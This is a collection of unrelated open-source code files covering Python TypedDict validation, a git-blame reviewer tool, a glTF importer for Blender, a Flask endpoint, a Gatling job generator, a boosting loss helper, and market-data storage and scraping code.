raise TypeError(f"{val} is not even a dictionary")
validate_TypedDict(val, typ)
elif hasattr(typ, '__args__'):
validate_compound_type(val, typ)
else:
if not isinstance(val, typ):
if issubclass(typ, Enum): # and isinstance(val, (int, str)):
validate_enum(val, typ)
else:
raise TypeError(f"{val} is not of type {typ}")
def validate_uniform_sequence(sequence: Iterable, item_type):
"""Ensures that every item in a given sequence is of the same particular
type. Example::
>>> validate_uniform_sequence((1, 5, 3), int)
>>> try:
... validate_uniform_sequence(['a', 'b', 3], str)
... except TypeError as e:
... print(e)
3 is not of type <class 'str'>
:param sequence: An iterable to be validated
:param item_type: The expected type of all items the iterable `sequence` yields.
"""
# assert not isinstance(item_type, str), f'Unresolved type name or forward reference for {item_type}!'
if isinstance(item_type, _TypedDictMeta):
for val in sequence:
if not isinstance(val, Dict):
raise TypeError(f"{val} is not of type {item_type}")
validate_TypedDict(val, item_type)
elif hasattr(item_type, '__args__'):
for val in sequence:
validate_compound_type(val, item_type)
else:
for val in sequence:
if not isinstance(val, item_type):
raise TypeError(f"{val} is not of type {item_type}")
def validate_compound_type(value: Any, T):
"""Validates a value against a compound type like
List[str], Tuple[int, ...], Dict[str, int]. Generally, compound types
are types with arguments. Returns None, if the validation was
successful, raises a TypeError if not. Example::
>>> validate_compound_type((1, 5, 3), Tuple[int, ...])
>>> try:
... validate_compound_type({1: 'a', 1.5: 'b'}, Dict[int, str])
... except TypeError as e:
... print(e)
1.5 is not of type <class 'int'>
:param value: the value which shall by validated against the given type
:param T: the type which the value is supposed to represent.
:return: None
:raise: TypeError if value is not of compound type T.
ValueError if T is not a compound type.
"""
if not hasattr(T, '__args__'):
raise ValueError(f'{T} is not a compound type.')
if isinstance(value, get_origin(T)):
if isinstance(value, Dict):
assert len(T.__args__) == 2, str(T)
key_type, value_type = T.__args__
validate_uniform_sequence(value.keys(), key_type)
validate_uniform_sequence(value.values(), value_type)
elif isinstance(value, Tuple):
if len(T.__args__) == 2 and T.__args__[-1] is Ellipsis:
validate_uniform_sequence(value, T.__args__[0])
else:
if len(T.__args__) != len(value):
raise TypeError(f"{value} is not of type {T}")
for item, typ in zip(value, T.__args__):
validate_type(item, typ)
else: # assume that value is of type List
if len(T.__args__) != 1:
raise ValueError(f"Unknown compound type {T}")
validate_uniform_sequence(value, T.__args__[0])
else:
raise TypeError(f"{value} is not of type {get_origin(T)}")
def validate_TypedDict(D: Dict, T: _TypedDictMeta):
"""Validates a dictionary against a TypedDict-definition and raises
a TypeError, if any of the following is detected:
- "Unexpeced" keys that have not been defined in the TypedDict.
- "Missing" keys, i.e. keys that have been defined in the TypedDict,
and not been marked as NotRequired/Optional
Types are validated recursively for any contained dictionaries, lists
or tuples. Example::
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> validate_TypedDict({'line': 1, 'character': 1}, Position)
>>> p = Position(line=1)
>>> try:
... validate_TypedDict(p, Position)
... except TypeError as e:
... print(e)
Type error(s) in dictionary of type <class 'json_validation.Position'>:
Missing required keys: {'character'}
:param D: the dictionary to be validated
:param T: the assumed TypedDict type of that dictionary
:return: None
:raise: TypeError in case a type error has been detected.
"""
assert isinstance(D, Dict), str(D)
assert isinstance(T, _TypedDictMeta), str(T)
type_errors = []
missing = T.__required_keys__ - D.keys()
if missing:
type_errors.append(f"Missing required keys: {missing}")
unexpected = D.keys() - (T.__required_keys__ | T.__optional_keys__)
if unexpected:
type_errors.append(f"Unexpected keys: {unexpected}")
for field, field_type in get_type_hints(T).items():
if field not in D:
continue
if isinstance(field_type, _TypedDictMeta):
value = D[field]
if isinstance(value, Dict):
validate_TypedDict(value, field_type)
else:
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not of {field_type}, "
f"but of type {type(D[field])}")
elif get_origin(field_type) is Union:
value = D[field]
for union_typ in field_type.__args__:
if isinstance(union_typ, _TypedDictMeta):
if isinstance(value, Dict):
try:
validate_TypedDict(value, union_typ)
break
except TypeError:
pass
elif hasattr(union_typ, '__args__'):
try:
validate_compound_type(value, union_typ)
break
except TypeError:
pass
elif isinstance(value, union_typ):
break
else:
# TODO: bugfix?
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not of {field_type}, "
f"but of type {type(D[field])}")
elif hasattr(field_type, '__args__'):
validate_compound_type(D[field], field_type)
elif isinstance(field_type, TypeVar):
pass # for now
elif not isinstance(D[field], field_type):
if issubclass(field_type, Enum):
validate_enum(D[field], field_type)
else:
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not a {field_type}, "
f"but a {type(D[field])}")
if type_errors:
raise TypeError(f"Type error(s) in dictionary of type {T}:\n"
+ '\n'.join(type_errors))
def type_check(func: Callable, check_return_type: bool = True) -> Callable:
"""Decorator that validates the type of the parameters as well as the
return value of a function against its type annotations during runtime.
Parameters that have no type annotation will be silently ignored by
the type check. Likewise, the return type.
Example::
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> class Range(TypedDict, total=True):
... start: Position
... end: Position
>>> @type_check
... def middle_line(rng: Range) -> Position:
... line = (rng['start']['line'] + rng['end']['line']) // 2
... character = 0
... return Position(line=line, character=character)
>>> rng = {'start': {'line': 1, 'character': 1},
... 'end': {'line': 8, 'character': 17}}
>>> middle_line(rng)
{'line': 4, 'character': 0}
>>> malformed_rng = {'start': 1, 'end': 8}
>>> try:
... middle_line(malformed_rng)
... except TypeError as e:
... print(e)
Parameter "rng" of function "middle_line" failed the type-check, because:
Type error(s) in dictionary of type <class 'json_validation.Range'>:
Field start: '1' is not of <class 'json_validation.Position'>, but of type <class 'int'>
Field end: '8' is not of <class 'json_validation.Position'>, but of type <class 'int'>
:param func: The function, the parameters and return value of which shall
be type-checked during runtime.
:return: The decorated function that will raise TypeErrors, if either
at least one of the parameter's or the return value does not
match the annotated types.
"""
arg_names = func.__code__.co_varnames[:func.__code__.co_argcount]
arg_types = get_type_hints(func)
return_type = arg_types.get('return', None)
if return_type is not None: del arg_types['return']
assert arg_types or return_type, \
f'type_check-decorated "{func}" has no type annotations'
@functools.wraps(func)
def guard(*args, **kwargs):
nonlocal arg_names, arg_types, return_type
arg_dict = {**dict(zip(arg_names, args)), **kwargs}
for name, typ in arg_types.items():
try:
validate_type(arg_dict[name], typ)
except TypeError as e:
raise TypeError(
f'Parameter "{name}" of function "{func.__name__}" failed '
f'the type-check, because:\n{str(e)}')
except KeyError as e:
raise TypeError(f'Missing parameter {str(e)} in call of '
f'"{func.__name__}"')
ret = func(*args, **kwargs)
if check_return_type and return_type:
try:
validate_type(ret, return_type)
except TypeError as e:
raise TypeError(
f'Value returned by function "{func.__name__}" failed '
f'the type-check, because: {str(e)}')
return ret
return guard
```
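A minimal usage sketch of the validators above, assuming the module is importable as `json_validation` (the name the doctests use); the `Color` enum and the dictionary literals are illustrative only:
```python
from enum import Enum
from typing import Dict, List

from json_validation import validate_type  # module name taken from the doctests

class Color(Enum):
    RED = 1
    GREEN = 2

validate_type(['alpha', 'beta'], List[str])      # passes
validate_type({'a': 1, 'b': 2}, Dict[str, int])  # passes
validate_type(2, Color)                          # passes: 2 is Color.GREEN's value
try:
    validate_type({'a': 'x'}, Dict[str, int])
except TypeError as e:
    print(e)  # x is not of type <class 'int'>
```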
|
{
"source": "JeckLabs/blame-reviewers",
"score": 3
}
|
#### File: blame-reviewers/reviewers/__main__.py
```python
import sh
def get_files_for_blame(diff: str) -> dict:
diff_lines = diff.splitlines()
skipping = 1
searching_filename = 2
searching_chunk = 3
state = skipping
chunks = {}
current_chunk_filename = None
for line in diff_lines:
if state == skipping:
if line[:4] != 'diff':
continue
state = searching_filename
elif state == searching_filename:
if line[:3] != '---':
continue
if line[4:] == '/dev/null':
continue
current_chunk_filename = line[6:]
state = searching_chunk
elif state == searching_chunk:
if line[:2] != '@@':
continue
if current_chunk_filename not in chunks:
chunks[current_chunk_filename] = []
line_numbers = line.split(" ")[1]
(start_line, offset) = map(int, line_numbers[1:].split(","))
chunks[current_chunk_filename].append((start_line, offset))
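            # NOTE: resetting to `skipping` here means only the first hunk of
            # each file diff is collected before scanning for the next file.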
state = skipping
return chunks
def get_authors_from_blame(blame: str) -> dict:
authors = {}
author_name = "unknown"
for line in blame.splitlines():
if line[0] == "\t":
continue
key, value = line.split(" ", 1)
if key == "author":
author_name = value
continue
if key != "author-mail":
continue
author_email = value[1:].split(">", 1)[0]
if author_email not in authors:
authors[author_email] = {
"count": 0,
"name": author_name,
}
authors[author_email]["count"] += 1
return authors
def add_authors_to_reviewers(reviewers: dict, authors: dict) -> dict:
for author_email, author_info in authors.items():
if author_email not in reviewers:
reviewers[author_email] = {
"name": author_info['name'],
"chunks_count": 0,
"total_count": 0,
}
reviewers[author_email]["chunks_count"] += 1
reviewers[author_email]["total_count"] += author_info["count"]
return reviewers
def main():
git = sh.git.bake("--no-pager")
merge_base = git("merge-base", "master", "HEAD")
merge_base_rev = str(merge_base).strip()
branch_diff_res = git.diff(merge_base_rev + "..", "--no-color")
branch_diff = str(branch_diff_res).strip()
files_for_blame = get_files_for_blame(branch_diff)
reviewers = {}
for filename, lines_info in files_for_blame.items():
for line, offset in lines_info:
print("Blaming %s %s,+%d..." % (filename, line, offset))
blame = git.blame("-L", "%d,+%d" % (line, offset), "--line-porcelain", merge_base_rev, "--", filename)
authors = get_authors_from_blame(blame)
reviewers = add_authors_to_reviewers(reviewers, authors)
print()
reviewers_table = sorted(reviewers.items(), reverse=True, key=lambda x: (x[1]["chunks_count"], x[1]["total_count"]))
for email, reviewer_info in reviewers_table:
print("{name:>25} {:>40} {chunks_count:>5}.{total_count}".format(email, **reviewer_info))
if __name__ == "__main__":
main()
```
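A quick sketch of the diff parser on a hand-written unified diff (the filename and hunk header are invented):
```python
sample_diff = """\
diff --git a/reviewers/__main__.py b/reviewers/__main__.py
index 1111111..2222222 100644
--- a/reviewers/__main__.py
+++ b/reviewers/__main__.py
@@ -10,4 +10,6 @@ def main():
 unchanged context line
"""
print(get_files_for_blame(sample_diff))
# {'reviewers/__main__.py': [(10, 4)]}
```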
|
{
"source": "JeckleCed/glTF-Blender-IO",
"score": 2
}
|
#### File: blender/imp/gltf2_blender_primitive.py
```python
import bpy
from mathutils import Vector
from .gltf2_blender_material import BlenderMaterial
from ..com.gltf2_blender_conversion import loc_gltf_to_blender
from ...io.imp.gltf2_io_binary import BinaryData
class BlenderPrimitive():
"""Blender Primitive."""
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def create(gltf, pyprimitive, verts, edges, faces):
"""Primitive creation."""
pyprimitive.blender_texcoord = {}
current_length = len(verts)
pos = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes['POSITION'])
if pyprimitive.indices is not None:
indices = BinaryData.get_data_from_accessor(gltf, pyprimitive.indices)
else:
indices = [(i,) for i in range(len(pos))]
pyprimitive.tmp_indices = indices
        # Manage only vertices that are referenced in the indices table
indice_equivalents = {}
new_pos = []
new_pos_idx = 0
for i in indices:
if i[0] not in indice_equivalents.keys():
indice_equivalents[i[0]] = new_pos_idx
new_pos.append(pos[i[0]])
new_pos_idx += 1
prim_verts = [loc_gltf_to_blender(vert) for vert in new_pos]
mode = 4 if pyprimitive.mode is None else pyprimitive.mode
prim_edges, prim_faces = BlenderPrimitive.edges_and_faces(mode, indices)
verts.extend(prim_verts)
pyprimitive.vertices_length = len(prim_verts)
edges.extend(
tuple(indice_equivalents[y] + current_length for y in e)
for e in prim_edges
)
faces.extend(
tuple(indice_equivalents[y] + current_length for y in f)
for f in prim_faces
)
# manage material of primitive
if pyprimitive.material is not None:
vertex_color = None
if 'COLOR_0' in pyprimitive.attributes.keys():
vertex_color = 'COLOR_0'
# Create Blender material if needed
if vertex_color is None:
if None not in gltf.data.materials[pyprimitive.material].blender_material.keys():
BlenderMaterial.create(gltf, pyprimitive.material, vertex_color)
else:
if vertex_color not in gltf.data.materials[pyprimitive.material].blender_material.keys():
BlenderMaterial.create(gltf, pyprimitive.material, vertex_color)
return verts, edges, faces
@staticmethod
def edges_and_faces(mode, indices):
"""Converts the indices in a particular primitive mode into standard lists of
edges (pairs of indices) and faces (tuples of CCW indices).
"""
es = []
fs = []
if mode == 0:
# POINTS
pass
elif mode == 1:
# LINES
# 1 3
# / /
# 0 2
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices), 2)
]
elif mode == 2:
# LINE LOOP
# 1---2
# / \
# 0-------3
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices) - 1)
]
es.append((indices[-1][0], indices[0][0]))
elif mode == 3:
# LINE STRIP
# 1---2
# / \
# 0 3
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices) - 1)
]
elif mode == 4:
# TRIANGLES
# 2 3
# / \ / \
# 0---1 4---5
fs = [
(indices[i][0], indices[i + 1][0], indices[i + 2][0])
for i in range(0, len(indices), 3)
]
elif mode == 5:
# TRIANGLE STRIP
# 0---2---4
# \ / \ /
# 1---3
def alternate(i, xs):
even = i % 2 == 0
return xs if even else (xs[0], xs[2], xs[1])
fs = [
alternate(i, (indices[i][0], indices[i + 1][0], indices[i + 2][0]))
for i in range(0, len(indices) - 2)
]
elif mode == 6:
# TRIANGLE FAN
# 3---2
# / \ / \
# 4---0---1
fs = [
(indices[0][0], indices[i][0], indices[i + 1][0])
for i in range(1, len(indices) - 1)
]
else:
raise Exception('primitive mode unimplemented: %d' % mode)
return es, fs
def set_normals(gltf, pyprimitive, mesh, offset, custom_normals):
"""Set Normal."""
if 'NORMAL' in pyprimitive.attributes.keys():
original_normal_data = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes['NORMAL'])
tmp_indices = {}
tmp_idx = 0
normal_data = []
for i in pyprimitive.tmp_indices:
if i[0] not in tmp_indices.keys():
tmp_indices[i[0]] = tmp_idx
tmp_idx += 1
normal_data.append(original_normal_data[i[0]])
for poly in mesh.polygons:
if gltf.import_settings['import_shading'] == "NORMALS":
calc_norm_vertices = []
for loop_idx in range(poly.loop_start, poly.loop_start + poly.loop_total):
vert_idx = mesh.loops[loop_idx].vertex_index
if vert_idx in range(offset, offset + pyprimitive.vertices_length):
cpt_vert = vert_idx - offset
mesh.vertices[vert_idx].normal = normal_data[cpt_vert]
custom_normals[vert_idx] = list(normal_data[cpt_vert])
calc_norm_vertices.append(vert_idx)
if len(calc_norm_vertices) == 3:
                        # Compute the face normal
vert0 = mesh.vertices[calc_norm_vertices[0]].co
vert1 = mesh.vertices[calc_norm_vertices[1]].co
vert2 = mesh.vertices[calc_norm_vertices[2]].co
calc_normal = (vert1 - vert0).cross(vert2 - vert0).normalized()
# Compare normal to vertex normal
                        for i in calc_norm_vertices:
                            cpt_vert = i - offset
vec = Vector(
(normal_data[cpt_vert][0], normal_data[cpt_vert][1], normal_data[cpt_vert][2])
)
if not calc_normal.dot(vec) > 0.9999999:
poly.use_smooth = True
break
elif gltf.import_settings['import_shading'] == "FLAT":
poly.use_smooth = False
elif gltf.import_settings['import_shading'] == "SMOOTH":
poly.use_smooth = True
else:
pass # Should not happen
offset = offset + pyprimitive.vertices_length
return offset
def set_UV(gltf, pyprimitive, obj, mesh, offset):
"""Set UV Map."""
for texcoord in [attr for attr in pyprimitive.attributes.keys() if attr[:9] == "TEXCOORD_"]:
if bpy.app.version < (2, 80, 0):
if texcoord not in mesh.uv_textures:
mesh.uv_textures.new(texcoord)
pyprimitive.blender_texcoord[int(texcoord[9:])] = texcoord
else:
if texcoord not in mesh.uv_layers:
mesh.uv_layers.new(name=texcoord)
pyprimitive.blender_texcoord[int(texcoord[9:])] = texcoord
original_texcoord_data = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes[texcoord])
tmp_indices = {}
tmp_idx = 0
texcoord_data = []
for i in pyprimitive.tmp_indices:
if i[0] not in tmp_indices.keys():
tmp_indices[i[0]] = tmp_idx
tmp_idx += 1
texcoord_data.append(original_texcoord_data[i[0]])
for poly in mesh.polygons:
for loop_idx in range(poly.loop_start, poly.loop_start + poly.loop_total):
vert_idx = mesh.loops[loop_idx].vertex_index
if vert_idx in range(offset, offset + pyprimitive.vertices_length):
obj.data.uv_layers[texcoord].data[loop_idx].uv = \
Vector((texcoord_data[vert_idx - offset][0], 1 - texcoord_data[vert_idx - offset][1]))
offset = offset + pyprimitive.vertices_length
return offset
def set_UV_in_mat(gltf, pyprimitive, obj, vertex_color):
"""After nodetree creation, set UVMap in nodes."""
if pyprimitive.material is None:
return
if gltf.data.materials[pyprimitive.material].extensions \
and "KHR_materials_pbrSpecularGlossiness" in \
gltf.data.materials[pyprimitive.material].extensions.keys():
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].extensions[
'KHR_materials_pbrSpecularGlossiness'
]['diffuse_type'] in [gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].extensions[
'KHR_materials_pbrSpecularGlossiness'
]['specgloss_type'] in [gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].pbr_metallic_roughness.color_type in \
[gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].pbr_metallic_roughness.metallic_type in \
[gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
def assign_material(gltf, pyprimitive, obj, bm, offset, cpt_index_mat):
"""Assign material to faces of primitives."""
if pyprimitive.material is not None:
vertex_color = None
if 'COLOR_0' in pyprimitive.attributes.keys():
vertex_color = 'COLOR_0'
obj.data.materials.append(bpy.data.materials[gltf.data.materials[pyprimitive.material].blender_material[vertex_color]])
for vert in bm.verts:
if vert.index in range(offset, offset + pyprimitive.vertices_length):
for loop in vert.link_loops:
face = loop.face.index
bm.faces[face].material_index = cpt_index_mat
cpt_index_mat += 1
offset = offset + pyprimitive.vertices_length
return offset, cpt_index_mat
```
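The strip and fan decompositions in `edges_and_faces` are easy to sanity-check outside Blender; a standalone sketch of the same winding logic over plain index lists:
```python
def strip_to_triangles(idx):
    # TRIANGLE STRIP: flip every odd-numbered triangle to keep faces CCW
    tris = []
    for i in range(len(idx) - 2):
        tri = (idx[i], idx[i + 1], idx[i + 2])
        tris.append(tri if i % 2 == 0 else (tri[0], tri[2], tri[1]))
    return tris

def fan_to_triangles(idx):
    # TRIANGLE FAN: every triangle shares the first vertex
    return [(idx[0], idx[i], idx[i + 1]) for i in range(1, len(idx) - 1)]

print(strip_to_triangles([0, 1, 2, 3, 4]))  # [(0, 1, 2), (1, 3, 2), (2, 3, 4)]
print(fan_to_triangles([0, 1, 2, 3, 4]))    # [(0, 1, 2), (0, 2, 3), (0, 3, 4)]
```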
|
{
"source": "jecklgamis/flask-example-app",
"score": 3
}
|
#### File: flask-example-app/app/api.py
```python
from flask import Blueprint, jsonify

bp = Blueprint('api', __name__, url_prefix='/api')
@bp.route('/', methods=['GET'])
def index():
return jsonify({"message": "This is the /api endpoint"})
```
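A sketch of wiring the blueprint into an application; the app-construction lines are assumed, not part of the repo file:
```python
from flask import Flask
from app.api import bp as api_bp

app = Flask(__name__)
app.register_blueprint(api_bp)
# GET /api/ now responds with {"message": "This is the /api endpoint"}
```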
|
{
"source": "jecklgamis/gatling-test-example",
"score": 3
}
|
#### File: k8s/job/create-job-yaml.py
```python
import argparse
import uuid
from jinja2 import Template
def write_job_file(template, output, name, java_opts, simulation_name):
template = Template(open(template, 'rt').read())
content = template.render(name=name, java_opts=java_opts, simulation_name=simulation_name)
open(output, 'wt').write(content)
print(f"Wrote {output}")
def parse_args():
parser = argparse.ArgumentParser(description='Create Kubernetes Job YAML file')
id = f"{str(uuid.uuid4())[:8]}"
parser.add_argument('--out',
default=f"job.yaml",
help='Job filename')
parser.add_argument('--name',
default=f"gatling-test-example-{id}",
help='Job name')
parser.add_argument('--java_opts',
default='-DbaseUrl=http://localhost:8080 -DrequestPerSecond=10 -DdurationMin=0.25',
help='Java opts')
parser.add_argument('--simulation',
default="gatling.test.example.simulation.ExampleGetSimulation",
help='Simulation name')
return parser.parse_args()
args = parse_args()
write_job_file('job-template.yaml', args.out, args.name, args.java_opts, args.simulation)
```
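The script is a thin wrapper around a Jinja2 render; a minimal sketch of that step with an inline, made-up template in place of `job-template.yaml`:
```python
from jinja2 import Template

tpl = Template(
    "metadata:\n"
    "  name: {{ name }}\n"
    "env: {{ java_opts }}\n"
    "simulation: {{ simulation_name }}\n"
)
print(tpl.render(
    name="gatling-test-example-abc12345",
    java_opts="-DrequestPerSecond=10",
    simulation_name="gatling.test.example.simulation.ExampleGetSimulation",
))
```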
|
{
"source": "jecktion/text_classification_gather",
"score": 3
}
|
#### File: text_classification_gather/a00_boosting/a08_boosting.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import numpy as np
import tensorflow as tf
#main process for boosting:
#1.compute label weight after each epoch using validation data.
#2.get weights for each batch during traininig process
#3.compute loss using cross entropy with weights
#1.compute label weight after each epoch using validation data.
def compute_labels_weights(weights_label,logits,labels):
    """
    compute weights for labels in current batch, and update weights_label(a dict)
    :param weights_label: a dict
    :param logits: [None,Vocabulary_size]
    :param labels: [None,]
    :return:
    """
    labels_predict=np.argmax(logits,axis=1) # logits:(256,108,754)
    for i in range(len(labels)):
        label=labels[i]
        label_predict=labels_predict[i]
        weight=weights_label.get(label,None)
        if weight is None:
if label_predict == label:
weights_label[label]=(1,1)
else:
weights_label[label]=(1,0)
else:
number=weight[0]
correct=weight[1]
number=number+1
if label_predict==label:
correct=correct+1
weights_label[label]=(number,correct)
return weights_label
#2.get weights for each batch during training process
def get_weights_for_current_batch(answer_list,weights_dict):
"""
get weights for current batch
:param answer_list: a numpy array contain labels for a batch
:param weights_dict: a dict that contain weights for all labels
:return: a list. length is label size.
"""
weights_list_batch=list(np.ones((len(answer_list))))
answer_list=list(answer_list)
for i,label in enumerate(answer_list):
acc=weights_dict[label]
weights_list_batch[i]=min(1.5,1.0/(acc+0.001))
#if np.random.choice(200)==0: #print something from time to time
# print("weights_list_batch:",weights_list_batch)
return weights_list_batch
#3.compute loss using cross entropy with weights
def loss(logits,labels,weights):
loss= tf.losses.sparse_softmax_cross_entropy(labels, logits,weights=weights)
return loss
#######################################################################
#util function
def get_weights_label_as_standard_dict(weights_label):
weights_dict = {}
for k,v in weights_label.items():
count,correct=v
weights_dict[k]=float(correct)/float(count)
return weights_dict
```
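A toy run of the three boosting steps above (a minimal sketch; the tiny logits array is invented):
```python
import numpy as np

logits = np.array([[2.0, 0.1],   # predicts class 0 (correct)
                   [0.2, 1.5],   # predicts class 1 (correct)
                   [0.3, 0.9]])  # predicts class 1, but the label is 0
labels = np.array([0, 1, 0])

weights_label = compute_labels_weights({}, logits, labels)
# {0: (2, 1), 1: (1, 1)}  -> (times seen, times correct) per label
acc = get_weights_label_as_standard_dict(weights_label)  # {0: 0.5, 1: 1.0}
print(get_weights_for_current_batch(labels, acc))
# label 0 -> min(1.5, 1/0.501) == 1.5 ; label 1 -> ~0.999
```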
|
{
"source": "jeckt/market_data",
"score": 3
}
|
#### File: market_data/market_data/data_adapter.py
```python
from abc import ABCMeta, abstractmethod, abstractproperty
from enum import Enum
# NOTE(steve): a factory method to return a type of data adapter based on
# source
def get_adapter(source):
if source == DataAdapterSource.JSON:
import market_data.json_data_adapter
return market_data.json_data_adapter.JsonDataAdapter
elif source == DataAdapterSource.SQLITE3:
import market_data.sqlite3_data_adapter
return market_data.sqlite3_data_adapter.Sqlite3DataAdapter
else:
raise InvalidDataAdapterSourceError(source)
class DataAdapterSource(Enum):
JSON = 1
SQLITE3 = 2
class DataAdapter(metaclass=ABCMeta):
@abstractproperty
def test_database(self):
raise NotImplementedError
@classmethod
@abstractmethod
def create_test_database(cls):
pass
@classmethod
@abstractmethod
def delete_test_database(cls):
pass
@classmethod
@abstractmethod
def create_database(cls, database):
pass
@classmethod
@abstractmethod
def connect(cls, conn_string):
pass
@abstractmethod
def close(self):
pass
@abstractmethod
def get_securities_list(self):
pass
@abstractmethod
def insert_securities(self, securities_to_add):
pass
@abstractmethod
def update_market_data(self, security, equity_data):
pass
@abstractmethod
def bulk_update_market_data(self, security, equity_data):
pass
@abstractmethod
def get_equity_data(self, security, dt):
pass
@abstractmethod
def get_equity_data_series(self, security):
"""Returns equity data series sorted by date (newest to oldest)"""
pass
class InvalidDataAdapterSourceError(Exception):
pass
class DatabaseExistsError(Exception):
pass
class DatabaseNotFoundError(Exception):
pass
```
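The factory in action (a sketch; `prices.db` is a made-up filename):
```python
import market_data.data_adapter as data_adapter

Adapter = data_adapter.get_adapter(data_adapter.DataAdapterSource.SQLITE3)
Adapter.create_database('prices.db')
conn = Adapter.connect('prices.db')
try:
    conn.insert_securities(['AMZN'])
    print(conn.get_securities_list())  # ['AMZN']
finally:
    conn.close()
```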
#### File: market_data/market_data/scraper.py
```python
import datetime
import urllib.request
from bs4 import BeautifulSoup
from market_data.data import EquityData, EmptyDateListError
from market_data.data import InvalidTickerError, InvalidDateError
class Scraper:
def __init__(self, source):
if not source == 'yahoo':
raise InvalidSourceError(source)
self.source = source
    # NOTE(steve): this allows the scrape equity data to accept
    # both datetime and date objects. It only needs the date.
@staticmethod
def _normalise_datetime(date):
try:
return date.date()
except AttributeError:
return date
@staticmethod
def _get_web_page(ticker):
url = r'https://finance.yahoo.com/quote/{ticker}/history?p={ticker}'
req = urllib.request.Request(url.replace('{ticker}', ticker))
with urllib.request.urlopen(req) as response:
page = response.read().decode('utf-8')
return page
@staticmethod
def _get_hist_price_data_table(page, ticker):
# NOTE(steve): parse the html page and find the table
# of historical price data based on table attributes
# to make it slightly more robust to changes in the webpage
# NOTE(steve): we use a try/except here to capture any errors in
# finding the historical prices table as it hides more of the
# implementation.
try:
parsed_html = BeautifulSoup(page, features='html.parser')
data_table = parsed_html.body.find('table',
attrs={'data-test':'historical-prices'})
data_table = data_table.find('tbody')
return data_table
        except Exception:
raise InvalidTickerError(ticker)
def scrape_equity_data(self, ticker, date):
date_only = Scraper._normalise_datetime(date)
page = Scraper._get_web_page(ticker)
data_table = Scraper._get_hist_price_data_table(page, ticker)
for row in data_table.children:
values = [col.next_element.text for col in
row.children if col.find('span')]
dt = datetime.datetime.strptime(values[0], '%b %d, %Y')
values[0] = dt.date()
if values[0] == date_only:
d = EquityData(*(v.replace(',', '') for v in values[1:]))
return d
raise InvalidDateError(f'{ticker}: {date}')
def scrape_eq_multiple_dates(self, ticker, date_list):
if date_list is None or len(date_list) == 0:
raise EmptyDateListError(ticker)
clean_date_list = [Scraper._normalise_datetime(dt) for dt in date_list]
page = Scraper._get_web_page(ticker)
data_table = Scraper._get_hist_price_data_table(page, ticker)
data = {}
for row in data_table.children:
values = [col.next_element.text for col in
row.children if col.find('span')]
dt = datetime.datetime.strptime(values[0], '%b %d, %Y')
values[0] = dt.date()
if values[0] in clean_date_list:
d = EquityData(*(v.replace(',', '') for v in values[1:]))
data[values[0]] = (values[0], d)
if len(data) == len(date_list):
break
# NOTE(steve): we need to order the data based on the
# order provided in the input date list
ordered_data = []
errors = []
for date in clean_date_list:
if date in data:
ordered_data.append(data[date])
else:
errors.append(InvalidDateError(date))
return ordered_data, errors
class InvalidSourceError(Exception):
pass
```
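Basic scraper usage (a sketch; this performs a live request against Yahoo Finance, and page-layout changes surface as `InvalidTickerError`):
```python
import datetime
from market_data.scraper import Scraper

scraper = Scraper('yahoo')
data = scraper.scrape_equity_data('AMZN', datetime.datetime(2019, 8, 23))
print(data)
```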
#### File: market_data/market_data/sqlite3_data_adapter.py
```python
import os
import datetime
from decimal import Decimal
import sqlite3
import freezegun
import market_data.data_adapter as data_adapter
from market_data.data import EquityData, InvalidTickerError, InvalidDateError
def adapt_date(dt):
return dt.strftime('%Y-%m-%d')
sqlite3.register_adapter(Decimal, lambda d: str(d))
sqlite3.register_converter("decimal", lambda d: Decimal(d.decode('utf-8')))
# NOTE(steve): freezegun has some pecularities where in certain situations
# it does not use the datetime.datetime adapter to convert datetime objects
# to string for the sqlite3 database so we explicit convert it
sqlite3.register_adapter(freezegun.api.FakeDatetime, adapt_date)
sqlite3.register_adapter(datetime.datetime, adapt_date)
sqlite3.register_converter("date",
lambda dt: datetime.datetime.strptime(dt.decode('utf-8'), '%Y-%m-%d'))
class Sqlite3DataAdapter(data_adapter.DataAdapter):
test_database = 'test.db'
@classmethod
def create_test_database(cls):
cls.create_database(cls.test_database)
@classmethod
def delete_test_database(cls):
if os.path.isfile(cls.test_database):
os.remove(cls.test_database)
else:
raise data_adapter.DatabaseNotFoundError
@classmethod
def create_database(cls, database):
        if os.path.isfile(database):
            raise data_adapter.DatabaseExistsError(database)
        conn = None
        try:
            conn = sqlite3.connect(database,
                                   detect_types=sqlite3.PARSE_DECLTYPES)
with conn:
security_list_sql = """CREATE TABLE securities(
id integer PRIMARY KEY AUTOINCREMENT,
ticker text NOT NULL,
UNIQUE(ticker)
);"""
cursor = conn.cursor()
cursor.execute(security_list_sql)
equity_data_sql = """CREATE TABLE equity_prices(
id integer PRIMARY KEY AUTOINCREMENT,
ticker_id integer NOT NULL,
date date NOT NULL,
open decimal NOT NULL,
high decimal NOT NULL,
low decimal NOT NULL,
close decimal NOT NULL,
adj_close decimal NOT NULL,
volume integer NOT NULL,
                    UNIQUE(ticker_id, date),
                    FOREIGN KEY(ticker_id)
REFERENCES securities(id)
);"""
cursor.execute(equity_data_sql)
except sqlite3.Error as e:
print(e)
